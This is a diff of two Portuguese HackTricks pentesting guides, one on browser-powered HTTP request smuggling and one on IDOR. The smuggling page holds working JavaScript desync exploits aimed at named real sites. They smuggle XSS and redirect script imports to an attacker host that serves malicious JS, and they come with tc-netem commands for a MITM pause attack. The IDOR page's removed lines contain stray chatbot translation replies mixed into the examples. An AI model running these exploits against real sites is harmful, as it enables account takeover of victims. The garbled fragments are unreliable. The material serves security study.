* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os repositórios** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

318
pentesting-web/http-request-smuggling/browser-http-request-smuggling.md
View file

@ -1,317 +1,31 @@
# Browser HTTP Request Smuggling
# Smuggling de Solicitação HTTP no Navegador
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking na AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
Outras maneiras de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do GitHub** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>
## CL.0/H2.0 desync compatível com navegador
Esta vulnerabilidade ocorre quando o cabeçalho **Content Length** (CL) é completamente **ignorado** pelo **servidor backend**. Então, o backend trata o **corpo** como o **início do método da segunda requisição**. Ignorar o CL é equivalente a tratá-lo como se tivesse um valor de 0, portanto, isso é um desync CL.0 - uma classe de ataque [conhecida](https://i.blackhat.com/USA-20/Wednesday/us-20-Klein-HTTP-Request-Smuggling-In-2020-New-Variants-New-Defenses-And-New-Challenges.pdf) mas menos explorada.
![](<../../.gitbook/assets/image (3) (1) (2).png>)
O ataque foi possível porque o servidor backend simplesmente **não estava esperando uma requisição POST**.
{% hint style="warning" %}
Note que esta vulnerabilidade é **ativada** por uma requisição HTTP **completamente válida**, em conformidade com a especificação. Isso significa que o **front-end não tem nenhuma chance de proteção** contra ela, e ela poderia até ser ativada por um navegador.
{% endhint %}
A única **diferença** entre **CL.0** e **H2.0** é que o segundo está usando **HTTP2** (que tem um cabeçalho de comprimento de conteúdo implícito), mas o **backend também não está usando isso**.
## Desync do Lado do Cliente
Ataques de desync tradicionais **envenenam** a **conexão** entre um servidor **front-end e backend**, e por isso são impossíveis em sites que não usam uma arquitetura front-end/backend. Estes são **desyncs do lado do servidor** a partir de agora. A maioria dos **desyncs do lado do servidor** só pode ser ativada por um **cliente HTTP personalizado emitindo uma requisição malformada.**
A capacidade de um **navegador causar um desync** possibilita uma nova classe de ameaça chamada **desync do lado do cliente** (CSD).\
Um ataque CSD começa com a **vítima visitando o site do atacante**, que então faz com que o navegador dela envie **duas requisições cross-domain para o site vulnerável**. A **primeira** requisição é elaborada para **desyncar a conexão do navegador** e fazer com que a **segunda requisição acione** uma resposta prejudicial, tipicamente dando ao atacante controle da conta da vítima.
### Detectar
Um vetor CSD é uma requisição HTTP com **duas** propriedades **chave**.
Primeiro, o **servidor deve ignorar o Content-Length (CL) da requisição**. Isso geralmente acontece porque a requisição ou **ativou um erro no servidor**, ou o servidor simplesmente **não estava esperando uma requisição POST** para o endpoint escolhido. Tente mirar em **arquivos estáticos** e **redirecionamentos no nível do servidor**, e ativar erros via **URLs excessivamente longas**, e **semi-malformadas** como /%2e%2e.
Em segundo lugar, a requisição deve ser **ativável em um navegador web cross-domain**. Navegadores restringem severamente o controle sobre requisições cross-domain, então você tem controle limitado sobre cabeçalhos, e se sua requisição tem um corpo, você precisará usar o método HTTP POST. No final, você só **controla** a **URL**, além de algumas outras coisas como o cabeçalho **Referer**, o **corpo**, e a **parte final do Content-Type.**
#### Teste de ignorância do CL
A maneira de testar essa má configuração é **enviar 2 requisições e contrabandear uma** no **meio**. Se a conexão **contrabandeada** **afetou** a resposta da **segunda** **requisição**, significa que está **vulnerável**:
![](<../../.gitbook/assets/image (1) (2) (2) (1).png>)
{% hint style="warning" %}
Note que você **não pode** testar essa vulnerabilidade apenas enviando um **Content-Length maior** do que o enviado e **procurando por um timeout**, porque alguns servidores **respondem** mesmo que **não tenham recebido o corpo inteiro**.
{% endhint %}
É importante notar se o **site alvo suporta HTTP**/2. Ataques CSD geralmente exploram a reutilização de conexão HTTP/1.1 e navegadores web **preferem usar HTTP/2** sempre que possível, então se o site alvo **suporta HTTP/2 seus ataques provavelmente não funcionarão**. Há uma **exceção**; alguns **proxies avançados não suportam HTTP/2** então você pode explorar qualquer um que os use. Isso inclui proxies corporativos, certas VPNs intrusivas e até algumas ferramentas de segurança.
### Confirmar
Primeiro, selecione um site para lançar o ataque. Este site deve ser **acessado via HTTPS** e localizado em um **domínio diferente do alvo**.
Em seguida, certifique-se de que você **não tem um proxy configurado**, e então navegue até o seu site de ataque. Abra as **ferramentas de desenvolvedor** e vá para a aba **Rede**. Para ajudar na depuração de problemas potenciais mais tarde, recomendo fazer os seguintes ajustes:
* Selecione a caixa de seleção **"Preserve log"**.
* Clique com o botão direito nos cabeçalhos das colunas e **ative a coluna "Connection ID"**.
Mude para o console do desenvolvedor e execute JavaScript para replicar sua sequência de ataque usando fetch(). Isso pode parecer algo como:
```javascript
fetch('https://example.com/', {
method: 'POST',
body: "GET /hopefully404 HTTP/1.1\r\nX: Y", // malicious prefix
mode: 'no-cors', // ensure connection ID is visible
credentials: 'include' // poison 'with-cookies' pool
}).then(() => {
location = 'https://example.com/' // use the poisoned connection
})
```
### Exploração - Armazenar
Uma opção é identificar funcionalidades no site alvo que permitam **armazenar dados de texto**, e criar o prefixo de modo que os cookies da vítima, cabeçalhos de autenticação ou senha acabem sendo **armazenados em algum lugar que você possa recuperar**. Este fluxo de ataque funciona [quase idêntico ao contrabando de requisições do lado do servidor](https://portswigger.net/web-security/request-smuggling/exploiting#capturing-other-users-requests), então não vou me aprofundar nisso.
### Exploração - **Encadear e pivotar**
Em circunstâncias normais, muitas classes de **ataque do lado do servidor** só podem ser lançadas por um atacante com acesso direto ao site alvo, pois **dependem de requisições HTTP que os navegadores se recusam a enviar**, como **manipulação** de **cabeçalhos HTTP** - envenenamento de cache da web, a maioria dos contrabandos de requisições do lado do servidor, ataques de cabeçalho de host, User-Agent baseado em [SQLi](https://portswigger.net/web-security/sql-injection), CSRF JSON Content-type e muitos outros.
O caminho mais simples para um ataque bem-sucedido veio de duas técnicas-chave geralmente usadas para ataques de desincronização do lado do servidor: [**envenenamento de recursos JavaScript via redirecionamentos de cabeçalho de Host**](https://portswigger.net/web-security/request-smuggling/exploiting#using-http-request-smuggling-to-turn-an-on-site-redirect-into-an-open-redirect), e usando o [**método HEAD**](https://portswigger.net/web-security/request-smuggling/advanced/request-tunnelling#non-blind-request-tunnelling-using-head) para juntar uma resposta com HTML prejudicial. Ambas as técnicas precisaram ser **adaptadas** para superar alguns desafios novos associados à operação no **navegador da vítima**.
## Exemplos de Exploração
### Exemplo de HEAD empilhado
* **Exploração colorida**
![](<../../.gitbook/assets/image (2) (3).png>)
* **Exploração JS**
```javascript
fetch('https://www.capitalone.ca/assets', {
method: 'POST',
// use a cache-buster to delay the response
body: `HEAD /404/?cb=${Date.now()} HTTP/1.1\r\nHost: www.capitalone.ca\r\n\r\nGET /x?x=<script>alert(1)</script> HTTP/1.1\r\nX: Y`,
credentials: 'include',
mode: 'cors' // throw an error instead of following redirect
}).catch(() => {
location = 'https://www.capitalone.ca/'
})va
```
Explicação:
* **Abuso de CL.0** em /assets (ele redireciona para /assets/ e não verifica o CL)
* **Contrabandear** uma requisição **HEAD** (porque as respostas HEAD ainda contêm um content-length)
* **Contrabandear** uma requisição **GET** cujo **conteúdo** vai ser **refletido** na resposta com o payload.
* Por causa do **content-length do HEAD** req, a **resposta** desta requisição será o **corpo da requisição HEAD**
* Definir **modo cors**. Normalmente isso não é feito, mas neste caso a **resposta** do servidor ao **POST inicial** é um **redirecionamento** que, se **seguido**, o **exploit não funcionará**. Portanto, o **modo cors** é usado para **desencadear** um **erro** e **redirecionar** a vítima com o **`catch`**.
### **Redirecionamento do cabeçalho do host + envenenamento de cache do lado do cliente**
* **Exploit JS**
```javascript
fetch('https://redacted/', {
method: 'POST',
body: "GET /+webvpn+/ HTTP/1.1\r\nHost: x.psres.net\r\nX: Y",
credentials: 'include'}
).catch(() => { location='https://redacted/+CSCOE+/win.js' })
```
* Uma requisição para `/+webvpn+/` com um **domínio diferente no cabeçalho Host** é respondida com um **redirecionamento** para `/+webvpn+/index.html` para aquele **domínio** dentro do cabeçalho Host.
* O local na **segunda** requisição é definido para `/+CSCOE+/win.js` a fim de **envenenar** o **cache** daquele arquivo `.js`.
* Esta requisição será respondida com o redirecionamento de `/+webvpn+/` para o domínio do atacante com o caminho `/+webvpn+/index.html`
* O **cache** de **`win.js`** será **envenenado** com um **redirecionamento** para a página do **atacante**, mas também a **vítima** irá **seguir** o redirecionamento como foi atribuído na variável `location` e terminará na página web do atacante.
* O atacante então **redirecionará** a **vítima** para `https://redacted/+CSCOE+/logon.html`. Esta página importará `/+CSCOE+/win.js`. Cujo **cache é um redirecionamento** para o servidor do **atacante**, portanto, o atacante pode **responder com um JS malicioso**.
A **vítima** irá **acessar** a página do **atacante** **duas vezes**, a primeira ela **espera um HTML** que redirecione a vítima de volta para `https://redacted/+CSCOE+/logon.html` e a segunda ela **espera código javascript** (o payload). Um poliglota pode ser usado para servir ambas as respostas em apenas uma:
```
HTTP/1.1 200 OK
Content-Type: text/html
alert('oh dear')/*<script>location = 'https://redacted/+CSCOE+/logon.html'</script>*/
```
### Carga útil HEAD com TE fragmentado
Ao procurar por CSD, você também pode **testar URLs semi-malformadas** como `/..%2f` ou `/%2f`.
* **Exploit Colorido**
![](<../../.gitbook/assets/image (5) (2) (1).png>)
* **Exploit JS**
```javascript
fetch('https://www.verisign.com/%2f', {
method: 'POST',
body: `HEAD /assets/languagefiles/AZE.html HTTP/1.1\r\nHost: www.verisign.com\r\nConnection: keep-alive\r\nTransfer-Encoding: chunked\r\n\r\n34d\r\nx`,
credentials: 'include',
headers: {'Content-Type': 'application/x-www-form-urlencoded'
}}).catch(() => {
let form = document.createElement('form')
form.method = 'POST'
form.action = 'https://www.verisign.com/robots.txt'
form.enctype = 'text/plain'
let input = document.createElement('input')
input.name = '0\r\n\r\nGET /<svg/onload=alert(1)> HTTP/1.1\r\nHost: www.verisign.com\r\n\r\nGET /?aaaaaaaaaaaaaaa HTTP/1.1\r\nHost: www.verisign.com\r\n\r\n'
input.value = ''
form.appendChild(input)
document.body.appendChild(form)
form.submit()
}
```
* A página **`/%2f`** é acessada para **explorar** a vulnerabilidade **CL.0**.
* Uma requisição **HEAD** é contrabandeada usando um **`Transfer-Encoding: chunked` header**.
* Esse cabeçalho é necessário neste cenário porque, caso contrário, o **servidor recusava aceitar uma requisição HEAD com um corpo**.
* Em seguida, o usuário envia um POST cujo corpo contém o **final do chunk da requisição HEAD anterior** e uma **nova requisição que é contrabandeada** com **conteúdo** (o payload JS) que será **refletido** na resposta.
* Portanto, o navegador tratará a **resposta à requisição HEAD** como a **resposta à requisição POST**, que também **conterá** na **resposta do corpo** que **reflete** a **entrada** do usuário na segunda requisição contrabandeada.
### Redirecionamento do cabeçalho Host + RC
* **JS Exploit**
```html
<script>
function reset() {
fetch('https://vpn.redacted/robots.txt',
{mode: 'no-cors', credentials: 'include'}
).then(() => {
x.location = "https://vpn.redacted/dana-na/meeting/meeting_testjs.cgi?cb="+Date.now()
})
setTimeout(poison, 120) // worked on 140. went down to 110
}
function poison(){
sendPoison()
sendPoison()
sendPoison()
setTimeout(reset, 1000)
}
function sendPoison(){
fetch('https://vpn.redacted/dana-na/css/ds_1234cb049586a32ce264fd67d524d7271e4affc0e377d7aede9db4be17f57fc1.css',
{
method: 'POST',
body: "GET /xdana-na/imgs/footerbg.gif HTTP/1.1\r\nHost: x.psres.net\r\nFoo: '+'a'.repeat(9826)+'\r\nConnection: keep-alive\r\n\r\n",
mode: 'no-cors',
credentials: 'include'
}
)
}
</script>
<a onclick="x = window.open('about:blank'); reset()">Start attack</a>
```
Neste caso, novamente, há um **host header** **redirect** que poderia ser usado para **hijack** uma importação de **JS**. No entanto, desta vez o **redirect não é cacheável**, então o envenenamento de **cache** do lado do cliente não é uma opção.
Portanto, o ataque realizado fará com que a **vítima acesse a página vulnerável** em uma aba e então, justo **antes** da página tentar **carregar um arquivo JS**, **envenene** o socket **smuggling connections** (3 neste caso).\
Como o **timing** tem que ser extremamente **preciso**, o ataque é realizado contra uma **nova aba a cada iteração** até funcionar.
{% hint style="warning" %}
Lembre-se de que neste caso `/meeting_testjs.cgi` foi atacado porque **carrega** um **Javascript** que está respondendo com um **404**, então não está em cache. Em outros cenários onde você tenta atacar um **JS que está em cache**, você precisa esperar que ele **desapareça do cache** antes de lançar um novo ataque.
{% endhint %}
Passos resumidos:
* Abrir uma nova janela.
* Emitir uma solicitação inofensiva ao alvo para estabelecer uma conexão nova, tornando os tempos mais consistentes.
* Navegar a janela para a página alvo em /meeting\_testjs.cgi.
* 120ms depois, criar três conexões envenenadas usando o gadget de redirecionamento.
* 5ms depois, enquanto renderiza /meeting\_testjs.cgi, a vítima tentará, com sorte, importar /appletRedirect.js e será redirecionada para x.psres.net, que fornece JS malicioso.
* Se não, tente o ataque novamente.
## Desync baseado em pausa <a href="#pause" id="pause"></a>
Pausar também pode criar novas vulnerabilidades de desync ao **desencadear implementações equivocadas de timeout de solicitação**.
Assim, um atacante pode enviar uma solicitação com **headers indicando que há um corpo**, e então **esperar** que o **front-end dê timeout antes de enviar o corpo**. Se o front-end der timeout mas **deixar a conexão aberta**, o **corpo** dessa solicitação será **tratado como uma nova solicitação**.
### Exemplo: **Varnish**
O cache Varnish tem um recurso chamado `synth()`, que permite emitir uma **resposta sem encaminhar** a solicitação para o back-end. Aqui está um exemplo de regra sendo usada para bloquear o acesso a uma pasta:
```javascript
if (req.url ~ "^/admin") {
return (synth(403, "Forbidden"));
}
```
Ao processar uma **solicitação parcial** que corresponde a uma regra sintética, o Varnish irá **expirar** se não receber dados por **15 segundos**. Quando isso acontece, ele **deixa a conexão aberta** para reutilização, mesmo que tenha lido apenas metade da solicitação do socket. Isso significa que, se o **cliente continuar com a segunda metade** da solicitação HTTP, ela será interpretada como uma **nova solicitação**.
Para desencadear um desync baseado em pausa em um front-end vulnerável, comece enviando seus cabeçalhos, prometendo um corpo e depois apenas espere. Eventualmente, você receberá uma resposta e, quando finalmente enviar o corpo da sua solicitação, ele será interpretado como um novo pedido:
![](<../../.gitbook/assets/image (4) (3) (1).png>)
{% hint style="warning" %}
Aparentemente, isso foi corrigido em 25 de janeiro como [CVE-2022-23959](https://varnish-cache.org/security/VSV00008.html).
{% endhint %}
### Exemplo: **Apache**
Assim como o Varnish, ele é vulnerável em **pontos finais onde o servidor gera a resposta por si mesmo** em vez de deixar o aplicativo lidar com a solicitação. Uma maneira de isso acontecer é com redirecionamentos no nível do servidor: `Redirect 301 / /en`
### Exploração do Lado do Servidor <a href="#server" id="server"></a>
Se o servidor vulnerável (Apache ou Varnish neste caso) estiver no back-end, é necessário um **front-end** que **transmita a solicitação para o servidor back-end** (cabeçalhos http neste caso) **sem armazenar em buffer** o corpo inteiro da solicitação.
![](<../../.gitbook/assets/image (3) (3).png>)
Neste caso, o atacante **não receberá o tempo de resposta até que ele tenha enviado o corpo**. Mas se ele conhece o tempo de expiração, isso não deve ser um problema.
O Application Load Balancer (ALB) da Amazon irá **transmitir os dados da conexão conforme necessário**, mas se ele **receber** a **resposta** para a solicitação pela metade (o tempo de expiração) **antes** de receber o **corpo**, ele **não enviará o corpo**, então uma **Condição de Corrida** deve ser explorada aqui:
<figure><img src="../../.gitbook/assets/image (1) (1) (2) (1).png" alt=""><figcaption></figcaption></figure>
Há uma complicação adicional ao **explorar o Apache por trás do ALB** - **ambos os servidores** têm um tempo de expiração padrão de **60 segundos**. Isso deixa uma **janela de tempo extremamente pequena** para enviar a segunda parte da solicitação. O ataque RC foi finalmente bem-sucedido após 66 horas.
### Exploração MITM
Aparentemente, **não é possível interromper uma solicitação do navegador** para explorar uma vulnerabilidade de desync baseada em pausa. No entanto, você sempre pode **realizar um ataque MITM para pausar uma solicitação** enviada pelo navegador. Observe que este ataque **não depende de descriptografar** nenhum tráfego.
O fluxo do ataque é muito **semelhante a um ataque de desync do lado do cliente regular**. O usuário visita uma página controlada pelo atacante, que emite uma série de **solicitações entre domínios** para o aplicativo alvo. A **primeira solicitação HTTP** é deliberadamente aumentada para ser tão **grande** que o sistema operacional **a divida em vários pacotes TCP**, permitindo que um **MITM ativo retarde o pacote final**, desencadeando um desync baseado em pausa. Devido ao preenchimento, o **atacante** pode **identificar** qual **pacote pausar** simplesmente com base no **tamanho**.
Do lado do cliente, parece um desync do lado do cliente regular usando o gadget HEAD, exceto pelo preenchimento da solicitação:
```javascript
let form = document.createElement('form')
form.method = 'POST'
form.enctype = 'text/plain'
form.action = 'https://x.psres.net:6082/redirect?'+"h".repeat(600)+ Date.now()
let input = document.createElement('input')
input.name = "HEAD / HTTP/1.1\r\nHost: x\r\n\r\nGET /redirect?<script>alert(document.domain)</script> HTTP/1.1\r\nHost: x\r\nFoo: bar"+"\r\n\r\n".repeat(1700)+"x"
input.value = "x"
form.append(input)
document.body.appendChild(form)
form.submit()
```
No sistema do atacante realizando o MITM cego, o atraso foi implementado usando tc-NetEm:
```bash
# Setup
tc qdisc add dev eth0 root handle 1: prio priomap
# Flag packets to 34.255.5.242 that are between 700 and 1300 bytes
tc filter add dev eth0 protocol ip parent 1:0 prio 1 basic \
match 'u32(u32 0x22ff05f2 0xffffffff at 16)' \
and 'cmp(u16 at 2 layer network gt 0x02bc)' \
and 'cmp(u16 at 2 layer network lt 0x0514)' \
flowid 1:3
# Delay flagged packets by 61 seconds
tc qdisc add dev eth0 parent 1:3 handle 10: netem delay 61s
```
## **Referências**
* Todas as informações deste post foram retiradas de [https://portswigger.net/research/browser-powered-desync-attacks](https://portswigger.net/research/browser-powered-desync-attacks)
**Confira a postagem em [https://portswigger.net/research/browser-powered-desync-attacks](https://portswigger.net/research/browser-powered-desync-attacks)**
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking na AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
Outras maneiras de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga**-nos no **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) no github.
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>

109
pentesting-web/idor.md
View file

@ -1,104 +1,29 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
- Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
Outras maneiras de apoiar o HackTricks:
- Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
- Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
- **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **Compartilhe suas técnicas de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>
**Confira o post: [https://medium.com/@vickieli/how-to-find-more-idors-ae2db67c9489](https://medium.com/@vickieli/how-to-find-more-idors-ae2db67c9489)**
**Post retirado de** [**https://medium.com/@vickieli/how-to-find-more-idors-ae2db67c9489**](https://medium.com/@vickieli/how-to-find-more-idors-ae2db67c9489)
<details>
# Lugares inesperados para procurar por IDORs <a href="#8d15" id="8d15"></a>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
## Não ignore IDs codificados e hasheados <a href="#d6ce" id="d6ce"></a>
Outras maneiras de apoiar o HackTricks:
Ao se deparar com um ID codificado, pode ser possível decodificar o ID codificado usando esquemas de codificação comuns.
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
E se a aplicação estiver usando um ID hasheado/aleatório, verifique se o ID é previsível. Às vezes, as aplicações usam algoritmos que produzem entropia insuficiente e, como tal, os IDs podem ser previstos após uma análise cuidadosa. Nesse caso, tente criar algumas contas para analisar como esses IDs são criados. Você pode ser capaz de encontrar um padrão que permitirá prever IDs pertencentes a outros usuários.
Além disso, pode ser possível vazar IDs aleatórios ou hasheados por meio de outro endpoint de API, em outras páginas públicas na aplicação (página de perfil de outros usuários, etc.), ou em uma URL via referer.
Por exemplo, uma vez encontrei um endpoint de API que permite aos usuários recuperar mensagens diretas detalhadas por meio de um ID de conversa hasheado. A solicitação se parece com isso:
```
GET /api_v1/messages?conversation_id=SOME_RANDOM_ID
```
Isso parece estar bem à primeira vista, já que o _conversation\_id_ é uma sequência alfanumérica longa e aleatória. Mas mais tarde descobri que é possível encontrar uma lista de conversas para cada usuário apenas usando o ID do usuário!
```
GET /api_v1/messages?user_id=ANOTHER_USERS_ID
```
Isso retornaria uma lista de _conversation\_ids_ pertencentes a esse usuário. E o _user\_id_ está disponível publicamente na página de perfil de cada usuário. Portanto, você pode ler as mensagens de qualquer usuário obtendo primeiro o user\_id na página de perfil deles, depois recuperando uma lista de conversation\_ids pertencentes a esse usuário e, finalmente, carregando as mensagens por meio do endpoint da API /api\_v1/messages!
## Se você não consegue adivinhar, tente criá-lo <a href="#b54f" id="b54f"></a>
Se os IDs de referência do objeto parecerem imprevisíveis, veja se há algo que você possa fazer para manipular o processo de criação ou vinculação desses IDs de objeto.
## Ofereça um ID para a aplicação, mesmo que ela não peça <a href="#9292" id="9292"></a>
Se nenhum ID for usado na solicitação gerada pela aplicação, tente adicioná-lo à solicitação. Tente adicionar _id, user\_id, message\_id_ ou outros parâmetros de referência de objeto e veja se isso faz diferença no comportamento da aplicação.
Por exemplo, se esta solicitação exibe todas as suas mensagens diretas:
```
GET /api_v1/messages
```
E este? Ele exibiria as mensagens de outro usuário?
```
GET /api_v1/messages?user_id=ANOTHER_USERS_ID
```
## HPP (Poluição de Parâmetros HTTP) <a href="#cb9a" id="cb9a"></a>
Vulnerabilidades de HPP (fornecimento de múltiplos valores para o mesmo parâmetro) também podem levar a IDOR. As aplicações podem não antecipar que o usuário envie múltiplos valores para o mesmo parâmetro e, ao fazê-lo, é possível contornar o controle de acesso estabelecido no endpoint.
Embora isso pareça ser raro e eu nunca tenha visto isso acontecer antes, teoricamente, seria assim. Se essa solicitação falhar:
```
GET /api_v1/messages?user_id=ANOTHER_USERS_ID
```
# IDOR (Insecure Direct Object Reference)
IDOR é uma vulnerabilidade que ocorre quando um aplicativo permite que um usuário acesse objetos diretamente por meio de uma referência a um identificador, como um número ou nome, sem qualquer outra forma de autenticação. Isso pode permitir que um invasor acesse recursos que não deveriam estar disponíveis para eles, como informações confidenciais ou funcionalidades restritas.
Existem várias maneiras de explorar uma vulnerabilidade IDOR, incluindo adivinhar ou enumerar identificadores, manipular solicitações HTTP ou usar ferramentas automatizadas para encontrar objetos ocultos.
Para evitar vulnerabilidades IDOR, os desenvolvedores devem implementar controles de acesso adequados e validar todas as solicitações do usuário para garantir que eles tenham permissão para acessar os objetos solicitados. Além disso, os identificadores não devem ser previsíveis ou sequenciais, e as solicitações devem ser protegidas contra manipulação ou interceptação.
```
GET /api_v1/messages?user_id=YOUR_USER_ID&user_id=ANOTHER_USERS_ID
```
Claro, por favor, envie o conteúdo que deseja traduzir.
```
GET /api_v1/messages?user_id=ANOTHER_USERS_ID&user_id=YOUR_USER_ID
```
I'm sorry, I'm not sure what you mean by "provide the parameters as a list". Could you please provide more context or clarify your request?
```
